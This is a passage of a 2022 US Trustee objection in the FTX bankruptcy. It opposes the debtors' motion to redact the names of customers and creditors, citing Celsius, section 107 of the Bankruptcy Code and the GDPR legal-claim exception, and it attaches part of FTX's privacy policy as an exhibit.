56.     As stated by the court in *Celsius*, the schedule of liabilities "constitute prima facie evidence of the validity and amount of the claims of creditors unless they are scheduled as disputed, contingent, or unliquidated," under Fed. R. Bankr. P. 3003. *Celsius,* 644 B.R. at 297. This transparency is "'important because creditors can look at the schedule and see whether their claim has been listed, and whether it is an undisputed claim, in which case, they don't have to file a proof of claim.'" *Id.* (quoting the court's statements at the hearing). The court further noted that "[e]nabling parties in interest and the public to see the identity of creditors and the amount of their claims, and then tracking the disposition and treatment of claims during the bankruptcy case, is important to the fairness and public perception of the bankruptcy process. Only in the rarest of cases should these ordinary expectations be upset." *Id.* [10]

57.     The disclosure of the identity of the Debtors' customers is also important because the amounts owed to the Debtors or the amounts the Debtors owed are likely probative to the Debtors' ability to successfully restructure. The Debtors have made no showing that disclosure of the identities of some of its creditors are "reasonably [] expected to cause the entity commercial injury." *In re Alterra Healthcare Corp.,* 353 B.R. 66, 75 (Bankr. D.Del., 2006). The Debtors simply cannot seek bankruptcy protection and then do business behind a shield of secrecy.

58.     The Privacy Policy also provides that FTX Trading Ltd. will "disclose any information we store associated with you to external parties" if required to do so to comply with

---

[10]    The Court in Celsius rejected the debtors' "anonymization" process, whereby the debtors would send individual e-mails to every account user that informed them of the amount at which their claim had been scheduled, and a number that would allow them to go to the claims agent's website to confirm the same. *Id.* at 287. The Court was not persuaded by this proposed solution, in part "because the public schedules do not merely serve the interests of individual creditors, but, rather, also serve the interests of creditors and the public in general—all parties and the public share an interest in complete transparency, with only the rarest of exceptions." *Id.* at 297.

23

**A0082**

any "legal process," and to "comply with applicable laws."  Privacy Policy at 9, 13.  The policy

further states that customers information may be sold or transferred in connection with a

reorganization or bankruptcy.  *Id.* at 9.

59.     As the Privacy Policy allows customers names and contact information to be

shared with numerous third parties, it is not secret or confidential. Moreover, the Privacy Policy

allows the Debtors to share privacy information if legally required to do so, as they are here,

under the statutory requirements of the Bankruptcy Code.

60.     The Debtors have neither tried to meet their burden of showing more than

speculative harm, nor have they established that such relief is actually necessary to protect a

party from harm. As to customers who are individuals, it is difficult to imagine how they could

be poached if all that is disclosed is their name, with no contact information.

61.     Like the Debtors in the present case, the debtors in *Celsius* sought authority to

redact the names and addresses of all of their customers, whether individuals or entities, arguing,

as the Debtors do here, that such information was confidential commercial information and could

lead to competitors "targeting the debtors customers and undermine[ing] the Debtors' ability to

reorganize."  *Celsius*, 644 B.R. at 291.   The court rejected this argument, describing the debtors'

"larger problem" to be the same as in the present case, which is that before and after they filed

for bankruptcy, the debtors froze all customer accounts, refusing to permit any withdrawals.  The

court noted that such action "has not won many fans among the Debtors' customers." *Id*. [11]

62.     The *Celsius* court recognized that it may be true, as one of the debtor's witness

explained, that "it is expensive and time consuming for crypto companies to identify, attach, and

---

[11]    The *Celsius* court further noted that, as here, the Debtors did not address with evidence whether
creditors who deposited crypto assets with the Debtors also maintain accounts with the debtors'
competitors. *See id.* at 292.

24

enroll potential customers." *Id.* at 292. The court indicated, however, that it did "not believe that is sufficient evidence to support sealing of the names of all creditors." *Id.* As to individual creditors, the court rejected the idea that names alone, without e-mail and physical addresses linked to such names, meet the stand for confidential commercial information under section 107(b)(1), because "[n]ames alone are simply not enough to facilitate a competitor's theft." *Id.* at 293. The court pointed out that by sealing individual customers' home and email addresses to protect those customers under section 107(c), the debtors would also "gain protection of whatever commercial value may flow from that information." *Id.* at 292. The court emphasized, however, that it was granting that protection with respect to addresses of individual customers, not for corporate, LLP or LLC customers. *Id.* [12]

63.     "The strong public policy of transparency and public disclosure in bankruptcy cases requires ***very narrow exceptions and only on strong evidentiary showings***." *Id.* at 292 (emphasis added). In these cases, as in *Celsius*, the Debtors' evidentiary showing is insufficient to justify the wholesale sealing of creditors identities. *Id.*

## B. The Debtors Have Not Established Grounds to Redact the Names of Customers and Creditors Who Are Individuals Under Section 107(c) of the Bankruptcy Code

64.     The Debtors have made no attempt to fulfill their burden of proof under Bankruptcy Code § 107(c). As that statute is applied in these cases, for the Court to exercise its discretion to protect the names of the Debtors' customers and other creditors who are individuals, the Debtors must furnish evidence and make a concrete showing that filing *only the names*, with no other information, of such individuals, "*would* create" an "*undue* risk" of identity

---

[12]     In so doing, the *Celsius* Court recognized rulings in other cases that reached different results, including the ruling of this Court in *Cred*. *See id.* at 292.

theft or other unlawful injury to those employees or their property.  11 U.S.C. § 107(c) (emphasis added).

65.     This issue also was addressed in *Celsius.* There, the court determined that "[i]dentifying the individual account holders by name, without physical and email addresses, is insufficient information to expose customers to risks of identity theft or personal danger."  644 B.R. at 293.  The court recognized that sealing such information from public disclosure "risks transforming the open and transparent bankruptcy process into something very different, which the Court is loath to do without a strong showing of real and not speculative risks."  *Id.*

66.     The Debtors in these cases have not set forth any facts demonstrating that disclosure of only the names of the Debtors' customers and creditors who are individuals, without any other contact information, would create any risk, let along any undue risk, of identity theft or other unlawful injury.   The Debtors provide, as an example, one incident that took place in another bankruptcy case in this District in 2017, but in that instance an address with provided along with the name. Mot. ¶ 18 (discussing *In re  Charming Charlie Holdings, Inc.*, No. 19-11534 (CSS)).  Similarly, the ruling in *In re Forever 21, Inc.*, cited by the Debtors, referenced persons who "seek to have their *addresses* withheld" to guard against identity theft.  Mot. ¶ 17 (emphasis added).

67.     Moreover, the Privacy Policy, quoted in paragraphs 17 and 18 above,  supports the argument that the information sought to be redacted does not meet any exception to section 107(a) of the Code.  The Privacy Policy specifically states that FTX Trading Ltd. may share customer's "personal information to business partners with whom we jointly offer products or services" and allow FTX Trading Ltd.'s "advertising partners to set Technologies and other tracking tools to collect information" regarding customers activities, their IP address, mobile

identifiers, and other information.  Objection Ex. A at 8-9.  The Privacy Policy also indicates that

FTX Trading Ltd. discloses "personal information" it collects about its customers to FTX

Trading Ltd.'s affiliates, as well as to service providers such as IT, banks, and customer service

providers.  *See id*.  Although the privacy policy provides a way for customers to prevent the

sharing of personal information with advertising partners, it does not do the same for sharing

information with FTX Trading Ltd.'s "business partners," affiliates, or service providers.  *See id.*

at 10-11.

      68.     Consistent with the depth of the public right to access of judicial documents,

Bankruptcy Code § 107(c) by its express terms requires both proof of undue risk – *i.e.*, not

merely a slightly possible, theoretical risk – as well as a certainty of such undue risk.  11 U.S.C.

§ 107(c).  The modifier "undue" must be proven by a movant under § 107(c)(1), and not read out

of the statute.  *In re Mazzeo,* 131 F.3d 295, 302 (2d Cir., 1997).  In the Motion, the Debtors

merely hypothesize, without the evidence required, that there is a possibility of just ordinary risk.

That simply does not suffice to fulfill the Debtors' heavy burden of proof under § 107(c).

*Cendant*, 260 F.3d at 194 ("Broad allegations of harm, bereft of specific examples or articulated

reasoning, are insufficient"); *see also Bernstein v. Bernstein Litowitz Berger & Grossman LLP*,

814 F.3d 132, 144-45 (2d Cir. 2016) ("'Broad and general findings' and 'conclusory assertion[s]'

are insufficient to justify deprivation of public access to the record, . . . 'specific, on-the-record

findings' are required.") (*quoting United States v. Erie Cty.*, 763 F.3d 235, 243 (2d Cir.

2014)(internal quotations omitted).

      69.     Without any additional proof establishing an "undue" risk of identity theft or

other unlawful injury to the Debtors' customers and creditors who are individuals by the mere

disclosure of their names, the Motion must be denied under § 107(c)(1).

C. **Names of Individuals Covered by the GDPR Should Not Be Redacted**

70.    The Debtors request the redaction of names and residential addresses of creditors who are citizens of a member nation of the EU, or are UK citizens, covered by either the EU GDPR or the UK GDPR.  That aspect of the Motion should be denied because:  (i) the scope of the Debtors' request is excessive; (ii) the GDPR does not supersede U.S. bankruptcy law for purposes of the Motion; and (iii) the GDPR makes an exception for the filing of such information in these bankruptcy cases.

### 1.    The Bankruptcy Code, Not the GDPR, Controls Here

71.    The Debtors, which consented to the jurisdiction of this Court by filing voluntary petitions for bankruptcy relief, have failed to set forth any authority for their implied proposition that the GDPR supersedes U.S. interests, as implemented through the disclosure provisions of the Bankruptcy Code, the Bankruptcy Rules, and related law.  To the contrary, in these chapter 11 cases, the Court simply may not be bound by the GDPR.

72.    In this regard, in the analogous discovery context, the Supreme Court has weighed in very clearly.  With respect to a French "blocking statute" that authorized criminal penalties for the production of economic, commercial and financial documents in foreign judicial proceedings, including U.S. proceedings, the Court unequivocally ruled: "It is well settled that such [foreign blocking] statutes do not deprive an American court of the power to order a party subject to its jurisdiction to produce evidence even though the act of production may violate that statute." *Societe Nationale Industrielle Aerospatiale v. U.S. Dt. Ct. for the Southern Dt. of Iowa*, 482 U.S. 522, 544 n.29 (1987); *see also Laydon v. Mizuho Bank, Ltd.*, 183 F. Supp. 3d. 409, 422-25 (S.D.N.Y. 2016) (denying European banks' objections to discovery based on 1995 EU Directive 95/46/EC (part of the UK Data Protection Act), because as a matter of comity, the

28

**A0087**

United States' national interests outweigh those of the UK); *Royal Park Investments SA/NV v. HSBC Bank USA, N.A.*, Case No. 14-CV-8175 (LGS), 2018 WL 745994 (S.D.N.Y. Feb. 6, 2018) (holding that plaintiff improperly withheld custodial information and substantially redacted individual names and email addresses in deference to Belgian Data Privacy Act, which restricts transfer of personal data to countries outside the EU).

73.    The *Celsius* court addressed this issue as well.  There, as here, the debtors sought authorization to redact the names, email addresses, and home addresses of any citizens of the UK or European Economic Area member countries, arguing that the disclosure of those names and addresses would risk violating the UK GDPR and the EU GDPR, which would expose the Debtors to potential civil liability and significant financial penalties. *Celsius*, 644 B.R. at 295. The court noted that there, as here, the debtors provided "no legal authority explicitly dictating why the UK GDPR and the EU GDPR should apply to the bankruptcy cases of the Debtors filed in the United States, or specifically, why the foreign laws would take precedence in a situation where United States law requires the disclosure of the information."  *Id*.  The court examined whether disclosure of the names and addresses of such individuals could be protected under 107(c), but indicated that it remained "unconvinced, beyond speculation, that the disclosure of names alone (without email or physical addresses) presents an imminent risk of harm."  *Id*.  The court also indicated that it would "not treat the UK and EU citizens differently than the United States citizens implicated in this case filed in New York."  *Id*.  The court ruled that the Debtors could redact home addresses and email addresses of any individual, including those located in the UK or the EU member countries, but denied the proposed redaction of the names of the individuals.  *Id*.  The U.S. Trustee believes the same result is warranted here.

**A0088**

74.     The Debtors should not be allowed to eviscerate long-standing disclosure requirements grafted into the Bankruptcy Rules and the Local Rules of this Court and the long-standing policies underlying those authorities.  While the UK and the EU have a legitimate interest in enforcing their own law, this Court's interest in enforcing the Bankruptcy Code in these bankruptcy cases is superior.  The Debtors have put forth no proof whatsoever, let alone the plausible evidence required, that their applicable Supervisory Authority or UK Commissioner, would unduly pursue enforcement action and issue penalties against them for obeying both U.S. law and a specific disclosure order of this Court.

75.     In addition, it appears that the Debtors do not even know which of their customers and creditors are citizens of the UK or an EU member country, because in many instances the Debtors do not have street addresses for such customers and creditors.  Even for those customers and creditors for whom the Debtors do have addresses, an address alone does not establish citizenship.

### 2.     Personal Information May Be Filed Under the GDPR Legal Claim Exception

76.     In addition, the Debtors have failed to discuss the GDPR's Legal Claim Exception, which facially appears to permit the disclosure of the names (as well as residential addresses) of EU and UK creditors in these bankruptcy cases.  Pursuant to the Legal Claim Exception, the Debtors' transfer of the names of EU or UK creditors to a third country such as the U.S., by filing the same in these bankruptcy cases, is allowed to the extent that "the transfer is necessary for the establishment, exercise or defence of legal claims."   GDPR, Art. 49(1)(e).  Recital 111 to the GDPR, which interprets the Legal Claim Exception, expressly provides that under the exception, a transfer of data, such as the names of EU or UK creditors at issue here, may take place where it is "occasional and necessary in relation to a contract or a legal claim,

**A0089**

regardless of whether in a judicial procedure or whether in an administrative or any out-of-court procedure, including procedures before regulatory bodies." GDPR Art. 49(1)(e), Recital 111.[13]

77.     According to official guidelines promulgated by the European Data Protection Board, the Legal Claim Exception broadly "covers a range of activities." *Guidelines 2/2018 on Derogations of Article 49 Under Regulation 2016/679* (May 25, 2018) ("EDPB Guidelines").[14] The EDPB Guidelines expressly provide that the Legal Claim Exception includes "actions by the data exporter to institute procedures in a third country[,] for example commencing litigation or seeking approval of a merger." EDPB Guidelines § 2.5. According to the European Data Protection Board, such third-country procedures, *e.g.* – legal proceedings in a third country – "must have a basis in law, including a formal, legal defined process," and "a close link is necessary between a data transfer and a specific procedure regarding the situation in question." *Id*.

78.     Here, it cannot be disputed that the requirements imposed by the U.S. Bankruptcy Rules and Local Rules of this Court constitute and furnish a well-recognized, "formal, legal defined process" within the meaning of EDPB Guidelines § 2.5. It follows that because full disclosure of the names of all creditors is required under Bankruptcy Rule 1007(a)(1) and Local Rule 1007-2(a), the Debtors' transfers of personal data to a third country under the GDPR, *i.e.* – their filing of the names of EU or UK creditors in these U.S. bankruptcy cases – is

---

[13]   A copy of Recital 111 may be found at https://gdpr.eu/Recital-111-Exceptions-for-certain-cases-of-international-transfers. The Recitals of the EU GDPR also apply to the UK GDPR. *See* https://ukgdpr.fieldfisher.com/recitals/.

[14]   A copy of the EDPB Guidelines may be found at https://edpb.europa.eu/our-work-tools/our-documents/publication-type/guidelines_en.  The EDPB has not applied to UK since January 1, 2021. https://edpb.europa.eu/sites/default/files/files/file1/edpb_statement_20201215_brexit_updated202101 13_en.pdf.  Nevertheless, the EDPB Guidelines may still be instructive in interpreting the UK GDPR with respect to the provisions discussed in this Objection, as such provisions in the UK GDPR are nearly identical to those of the EU GDPR.

unquestionably "necessary for the establishment [and] exercise" of the Debtors' "legal claims" in these U.S. bankruptcy cases. GDPR Art. 49(1)(e). By virtue of having voluntarily requested relief under chapter 11 of the Bankruptcy Code, the Debtors subjected themselves to the non-discretionary disclosure requirements of Bankruptcy Rule 1007(a)(1) and Local Rule 1007-2(a). Thus, the Debtors' filing of unredacted names of EU and UK creditors, *i.e.* – their transfers of personal data to a third country under the GDPR – fulfills the requisite "necessary" standard of the Legal Claim Exception of GDPR, Art. 49(1)(e). For these same reasons, the filing of the names of EU and UK creditors by the Debtors is "necessary" within the meaning of Recital 111 to GDPR, Art. 49(1)(e), and such filing fulfills the "close link" requirement of EDPB Guidelines § 2.5.

79.     In addition, the Debtors' disclosure of the names of EU and UK creditors in these cases also squarely satisfies the requirement of the applicable GDPR Recital. GDPR Art. 49(1)(e), Recital 111 (data transfers must be "occasional"). The Debtors are required to include the names of EU and UK creditors in the Creditor Matrix, the Consolidated Top 50 Creditors List and also in the Debtors' Schedules and Statements of Financial Affairs. 11 U.S.C. § 521(a)(1)(B), Bankruptcy Rules 1007(a)(1) and 1007-1(b), and Official Form 201. Therefore, in terms of GDPR Recital 111, at the underlying "data transfers" of names of EU and UK creditors by the Debtors will occur with only "occasional" frequency within the meaning of the Recital. GDPR Art. 49(1)(e), Recital 111.

80.     Though the Debtors bear the burden of proof here, the Motion fails to bear any indication that they have pursued any threshold assessments of their risk of penalization under the GDPR. There is, for example, no proof that the Debtors simply sought the consent of the EU and UK creditors to include their names in the Creditor Matrix, the Consolidated Top 50

32

**A0091**

Creditors List, and the Debtors' Schedules and Statements, rather than asking for extraordinary judicial relief.  GDPR Art. 49(1)(A).  The Motion also fails to demonstrate that the Debtors have made an inquiry with their applicable EU GDPR Supervisory Authority or UK Commissioner about the lawfulness of transferring the names of the EU and UK creditors to the U.S. by filing that information in these bankruptcy cases pursuant to the requirements of the Bankruptcy Rules and the Local Rules of this Court, or seeking a permit from their Supervisory Authority or UK Commissioner to do so.   Particularly in light of the tenets of the Legal Claim Exception, of the discretion expressly given by the GDPR to the Debtors' Supervisory Authority or UK Commissioner, and of the strength of the American laws militating in favor of full disclosure in these bankruptcy cases, these types of diligence by the Debtors are crucial at this relatively early stage of the implementation of the GDPR, and critical to the Debtors' faithful fulfillment of their fiduciary duties here.

81.     For the reasons set forth above, the relief requested by the Motion as it regards EU and UK citizens who are individual customers-creditors of the Debtors should be denied, except so as to allow the redaction of their residential and email addresses.

### D.  The Debtors Must File Under Seal Unredacted Versions of All Documents They File in a Redacted Format

82.     In the event the Court grants any portion of the Debtors' Motion seeking to redact customer and creditor information, it appears that the Debtors are seeking to bypass the requirement that they file under seal an unredacted version of each redacted document filed. Instead, the Debtors propose to provide such unredacted documents to the Court only "upon request."  Under the Local Rules of this Court, it is not sufficient to simply file a redacted version of a document and nothing else, especially with respect to documents that are required by the Bankruptcy Code and the Bankruptcy Rules to be filed, such as the Creditor Matrix, and the

33

**A0092**

Schedules and Statements. *See* Del. Bankr. L.R. 9018-1(d).

83.     At the request of the U.S. Trustee, the Debtors did modify the proposed the

Interim Order on the Motion to require that an unredacted version of the Creditor Matrix be filed

under seal with the Court.  However, the Debtors did not agree to the U.S. Trustee's request for

the interim order to provide that *all* redacted documents also be filed under seal in an unredacted

format.  To the extent this Court grants any portion of the Motion as it concerns redaction, the

final order should be modified to require that any party who files a document with information

that has been authorized by the Court to be redacted must also file an unredacted version of the

same with the Court under seal.

84.     The U.S. Trustee leaves the Debtors to their burden of proof and reserves any and

all rights, remedies and obligations to, *inter alia*, complement, supplement, augment, alter and/or

modify this Objection, file an appropriate Motion and/or conduct any and all discovery as may

be deemed necessary or as may be required and to assert such other grounds as may become

apparent upon further factual discovery.


WHEREFORE, the U.S. Trustee respectfully requests that the Court deny the final relief

requested by the Motion, as it concerns redaction of information, except to allow the redaction

from public filings of the addresses and email addresses – but not names – of individuals who are

customers or other creditors of the Debtors, and grant any such other and further relief that the

Court deems just and proper.

Respectfully Submitted,

**ANDREW R. VARA,**
**ACTING UNITED STATES TRUSTEE**
**REGIONS 3 AND 9**

Dated: December 12, 2022

By: */s/ Juliet Sarkessian*
Juliet Sarkessian, Esq.
Trial Attorney
United States Department of Justice
Office of the United States Trustee
J. Caleb Boggs Federal Building
844 N. King Street, Room 2207, Lockbox 35
Wilmington, DE 19801
(302) 573-6491
Juliet.M.Sarkessian@usdoj.gov

# EXHIBIT A



Sign in

FTX Exchange > Getting Started with FTX > Legal

Search Help Center

# Privacy Policy



FTX Crypto Derivatives Exchange
Updated 3 months ago

**FTX Privacy Policy**

**January 27, 2022**

FTX Trading Ltd. d/b/a FTX ("FTX," "we," "us" or "our") is a cryptocurrency trading exchange accessible via our site located at www.ftx.com and our mobile application FTX Pro.  Our Privacy Policy ("Privacy Policy") is designed to help you understand how we collect, use and share your personal information and to assist you in exercising the privacy rights available to you.

SCOPE

This Privacy Policy applies to personal information processed by us in our business, including on our websites, mobile applications, and other online or offline offerings (collectively, the "Services"). This Policy applies to our operating divisions, subsidiaries, affiliates, and branches.

1......... PERSONAL INFORMATION WE COLLECT

2......... HOW WE USE YOUR INFORMATION

3......... DISCLOSING YOUR INFORMATION TO THIRD PARTIES

4......... YOUR PRIVACY CHOICES AND RIGHTS

5......... DATA RETENTION

6......... SECURITY OF YOUR INFORMATION

7......... INTERNATIONAL DATA TRANSFERS

8......... CHILDREN'S INFORMATION

9......... SUPERVISORY AUTHORITY

10....... CHANGES TO OUR PRIVACY POLICY

11 .... CONTACT US

## 1. PERSONAL INFORMATION WE COLLECT

The categories of personal information we collect depend on whether you are a customer, user, applicant or visitor, and the requirements of applicable law.

**Information You Provide to Us**

- **Account Creation**. To create an account with us and use our Services, we may collect the following information from you:

  - Identification information: First and last name, date of birth, gender, phone number, email, government identification number (including tax identification, driver's license number and passport number) and other information necessary to verify your identity to comply with our regulatory obligations under financial or anti-money laundering laws;

  - Institutional information: If you are an institutional customer, we may collect your institution's legal name, Employer Identification number (or comparable number issued by a government), proof of legal formation (e.g. Articles of Incorporation) and personal identification information for all material beneficial owners;

  - Financial information: Bank account information, routing number, transaction history, trading data and/or tax identification;

**A0097**

○ **Transaction information:** Information about the transactions you make using our Services, such as the name of the recipient and the trading amount;

○ **Employment information:** Your job title, office location or source of income; and

○ **Correspondence:** Information you provide to our support teams.

**Your Communications with Us**. We collect personal information from you such as email address, phone number, or mailing address when you request information about our Services, request customer or technical support, apply for a job or otherwise communicate with us.

**Surveys**. We may contact you to participate in surveys. If you decide to participate, you may be asked to provide certain information which may include personal information.

**Social Media Content**. We may offer forums, blogs, or social media pages. Any content you provide on these channels will be considered "public" and is not subject to privacy protections.

**Registration for Sweepstakes or Contests**. We may run sweepstakes and contests. Contact information you provide may be used to reach you about the sweepstakes or contest and for other promotional, marketing and business purposes, if permitted by law. In some jurisdictions, we are required to publicly share information of winners.

## Information Collected Automatically or From Others

**Automatic Data Collection**. We may collect certain information automatically when you use the Services. This information may include your Internet protocol (IP) address, user settings, MAC address, cookie identifiers, mobile carrier, mobile advertising and other unique identifiers, details about your browser, operating system or device, location information, Internet service provider, pages that you visit before, during and after using the Services, information about the links you click, and other information about how you use the Services. Information we collect may be associated with accounts and other devices.

In addition, we may automatically collect data regarding your use of our Services, such as the types of content you interact with and the frequency and duration of your activities. We may combine your information with information that other people provide when they use our Services, including information about you when they tag you.

**Cookies, Pixel Tags/Web Beacons, Analytics Information, and Interest-Based Advertising technologies.** We, as well as third parties that provide content, advertising, or other functionality on the Services, may use cookies, pixel tags, local storage, and other

**A0098**

technologies ("Technologies") to automatically collect information through the Services. Technologies are essentially small data files placed on your computer, tablet, mobile phone, or other devices that allow us and our partners to record certain pieces of information whenever you visit or interact with our Services.

- **Cookies**. Cookies are small text files placed in visitors' computer browsers to store their preferences. Most browsers allow you to block and delete cookies. However, if you do that, the Services may not work properly.

- **Pixel Tags/Web Beacons**. A pixel tag (also known as a web beacon) is a piece of code embedded in the Services that collects information about users' engagement on that web page. The use of a pixel allows us to record, for example, that a user has visited a particular web page or clicked on a particular advertisement.

**Analytics and Financial Data**. We use third-party tools to monitor and analyze the use of our Services, and to automate certain processes related to the development and operation of our Services:

- **Google Analytics and Others**. We may use Google Analytics and other service providers to collect information regarding visitor behavior and visitor demographics on our Services. For more information about Google Analytics, please visit http://www.google.com/policies/privacy/partners/. For more information about Google's privacy practices, please visit https://policies.google.com/privacy?hl=en. You can opt out of Google's collection and processing of data generated by your use of the Services by going to http://tools.google.com/dlpage/gaoptout.

- **Plaid**. We may use Plaid Technologies, Inc. ("Plaid"), as a vendor to collect information about you, and you acknowledge and agree that the terms and conditions of Plaid's privacy policy (found here: https://plaid.com/legal/#privacy-policy) will govern Plaid's use of such information, and that you expressly agree to the terms and conditions of Plaid's privacy policy. You hereby expressly grant Plaid the right, power, and authority to access and transmit your information as reasonably necessary for Plaid to provide its services to you in connection with your use of the Platform.

- **FullStory:** We use FullStory for recording your interactions with our Services which helps us deliver a better user experience. For more information on the privacy practices of FullStory, please visit https://www.fullstory.com/legal/privacy/.

- **VWO**: We may use VWO, offered by Wingify Software Pvt. Ltd. ("Wingify"), to run A/B tests on our Services and deliver a better user experience. For more information on the privacy practices of Wingify, please visit https://vwo.com/privacy-policy/.

**A0099**

- **Segment**: We may use Segment, offered by Segment.io, Inc. ("Segment") to collect information about your use of our Services. For more information on the privacy practices of Segment, please visit https://segment.com/legal/privacy/.

**Information from Other Sources.** We may obtain information about you from other sources, including through third party services and organizations to supplement information provided by you. For example, if you access our Services through a third-party application, such as an app store, a third-party login service, or a social networking site, we may collect information about you from that third-party application that you have made public via your privacy settings. Information we collect through these services may include your name, your user identification number, your user name, location, gender, birth date, email, profile picture, and your contacts stored in that service. This supplemental information allows us to verify information that you have provided to us and to enhance our ability to provide you with information about our business, products, and Services.

2. HOW WE USE YOUR INFORMATION

We use your information for a variety of business purposes, including to:

**Fulfill our contract with you and provide you with our Services, such as:**

- Managing your information and accounts;

- Providing access to certain areas, functionalities, and features of our Services;

- Communicating with you about your account, activities on our Services and policy changes;

- Undertaking activities to verify or maintain the quality or safety of a service or device;

- Processing your financial information and other payment methods for products or Services purchased;

- Providing promotional, advertising, analytics and marketing services;

- Processing applications and transactions; and

- Allowing you to register for events.

Analyze and improve our Services pursuant to our legitimate interest, such as:

- Detecting security incidents, protecting against malicious, deceptive, fraudulent or illegal activity, and prosecuting those responsible for that activity;

- Measuring interest and engagement in our Services and short-term, transient use, such as contextual customization of ads;

**A0100**

- Undertaking research for technological development and demonstration;

- Researching and developing products, services, marketing or security procedures to improve their performance, resilience, reliability or efficiency;

- Improving, upgrading or enhancing our Services or those of our Providers;

- Developing new products and Services;

- Ensuring internal quality control;

- Verifying your identity and preventing fraud;

- Debugging to identify and repair errors that impair existing intended functionality;

- Enforcing our terms and policies; and

- Complying with our legal obligations, protecting your vital interest, or as may be required for the public good.

Provide you with additional content and Services, such as:

- Furnishing you with customized materials about offers, products, and Services that may be of interest, including new content or Services;

- Auditing relating to interactions, transactions and other compliance activities; and

- Other purposes you consent to, are notified of, or are disclosed when you provide personal information.

**Automated profiling**. We may use technologies considered automated decision making or profiling. We will not make automated decisions about you that would significantly affect you, unless such a decision is necessary as part of a contract we have with you, we have your consent, or we are permitted by law to use such technology. You may escalate any concerns you have by contacting us below.

**Use De-identified and Aggregated Information.** We may use personal information and other data about you to create de-identified and aggregated information, such as de-identified demographic information, de-identified location information, information about the computer or device from which you access our Services, or other analyses we create.

**Share Content with Friends or Colleagues.** Our Services may offer various tools and functionalities. For example, we may allow you to provide information about your friends through our referral services. Our referral services may allow you to forward or share

**A0101**

certain content with a friend or colleague, such as an email inviting your friend to use our Services.

**How We Use Automatic Collection Technologies.**  We, as well as third parties that provide content, advertising, or other functionality on the Services, may use cookies, pixel tags, local storage, and other technologies to automatically collect information through the Services.  Our uses of these Technologies fall into the following general categories:

- **Operationally Necessary**. This includes Technologies that allow you access to our Services, applications, and tools that are required to identify irregular site behavior, prevent fraudulent activity and improve security or that allow you to make use of our functionality;

- **Performance Related**. We may use Technologies to assess the performance of our Services, including as part of our analytic practices to help us understand how our visitors use the Services (see *Analytics and Financial Data* above). For example, we may track your activity on the Services, including recordings of your interactions with the Services;

- **Functionality Related**. We may use Technologies that allow us to offer you enhanced functionality when accessing or using our Services.  This may include identifying you when you sign into our Services or keeping track of your specified preferences, interests, or past items viewed;

- **Advertising or Targeting Related**. We may use first party or third-party Technologies to deliver content, including ads relevant to your interests, on our Services or on third party sites.

**Cross-Device Tracking**.  Your browsing activity may be tracked across different websites and different devices or apps.  For example, we may attempt to match your browsing activity on your mobile device with your browsing activity on your laptop.  To do this our technology partners may share data, such as your browsing patterns, geo-location and device identifiers, and will match the information of the browser and devices that appear to be used by the same person.

**Notice Regarding Third Party Websites, Social Media Platforms and Software Development Kits.**  The Services may contain links to other websites, and other websites may reference or link to our website or other Services.  These other websites are not controlled by us.  We encourage our users to read the privacy policies of each website and application with which they interact.  We do not endorse, screen or approve and are not responsible for the privacy practices or content of such other websites or applications. Visiting these other websites or applications is at your own risk.

**A0102**

Our Services may include publicly accessible blogs, forums, social media pages, and private messaging features.  By using such Services, you assume the risk that the personal information provided by you may be viewed and used by third parties for any number of purposes.  In addition, social media buttons such as Facebook, Linked In, Google, etc. (that might include widgets such as the "share this" button or other interactive mini-programs) may be on our site.  These features may collect your IP address, which page you are visiting on our site, and may set a cookie to enable the feature to function properly.  These social media features are either hosted by a third party or hosted directly on our site.  Your interactions with these features apart from your visit to our site are governed by the privacy policy of the company providing it.

We may use third party APIs and software development kits ("SDKs") as part of the functionality of our Services.  APIs and SDKs may allow third parties including analytics and advertising partners to collect your personal information for various purposes including to provide analytics services and content that is more relevant to you.  For instance, we use the SardineAI SDK for fraud protection purposes. The SardineAI SDK collects your mobile battery usage, mobile Device Identifier, device storage information, MAC Address, and SIM information and collects enough information to determine if you are trying to hide your current location by using a VPN, VPN apps with location spoofing, or other related tools. For more information about our use of APIs and SDKs, please contact us as set forth below.

3.  DISCLOSING YOUR INFORMATION TO THIRD PARTIES

We may share your personal information with the following categories of third parties:

**Service Providers.**  We may share any personal information we collect about you with our third- party service providers.  The categories of service providers (processors) to whom we entrust personal information include: IT and related services; banks and trust companies; information and services; payment processors; customer service providers; and vendors to support the provision of the Services.

For the provision of fiat payment functions available in FTX, we may share personal data you have provided to FTX during the Account Creation process (see Personal Information We Collect) with Paysafe during the wallet sign-up process for the purpose of responding to regulatory queries received by our service providers. These secure transfers will be limited to those strictly necessary to meet this purpose and ensure the continuation of the service. For more information on this service https://www.paysafe.com/en/paysafegroup/comprehensive-privacy-policy/.  ⌃

**Business Partners.**  We may provide personal information to business partners with whom we jointly offer products or services.  In such cases, our business partner's name will appear along with ours.

**A0103**

**NFT Partners**. Non-fungible token ("NFT") issuers or projects offering their NFTs via our Services ("NFT Partners") may offer NFT buyers promotional items or rewards (the "Rewards") in connection with NFT purchases made via the Services. If you choose to redeem your Rewards, we will provide the NFT Partner with your identifying information, such as your name and mailing address.

**Affiliates.** We may share personal information with our affiliated companies.

**Advertising Partners.** Through our Services, we may allow third party advertising partners to set Technologies and other tracking tools to collect information regarding your activities and your device (e.g., your IP address, mobile identifiers, page(s) visited, location, time of day). We may also combine and share such information and other information (such as demographic information and past purchase history) with third party advertising partners. These advertising partners may use this information (and similar information collected from other websites) for purposes of delivering targeted advertisements to you when you visit third party websites within their networks. This practice is commonly referred to as "interest-based advertising" or "online behavioral advertising. We may allow access to other data collected by the Services to share information that may be useful, relevant, valuable or otherwise of interest to you. If you prefer not to share your personal information with third party advertising partners, you may follow the instructions below.

**Disclosures to Protect Us or Others.** We may access, preserve, and disclose any information we store associated with you to external parties if we, in good faith, believe doing so is required or appropriate to: comply with law enforcement or national security requests and legal process, such as a court order or subpoena; protect your, our or others' rights, property, or safety; enforce our policies or contracts; collect amounts owed to us; or assist with an investigation or prosecution of suspected or actual illegal activity.

**Disclosure in the Event of Merger, Sale, or Other Asset Transfers.** If we are involved in a merger, acquisition, financing due diligence, reorganization, bankruptcy, receivership, purchase or sale of assets, or transition of service to another provider, then your information may be sold or transferred as part of such a transaction, as permitted by law and/or contract.

You acknowledge that all information processed by us may be transferred, processed, and stored anywhere in the world, including but not limited to, the United States or other countries, which may have data protection laws that are different from the laws where you live. We have taken appropriate safeguards to require that your personal information will remain protected and require our third-party service providers and partners to have appropriate safeguards as well. Further details can be provided upon request.

## 4. YOUR PRIVACY CHOICES AND RIGHTS

**A0104**

**General**

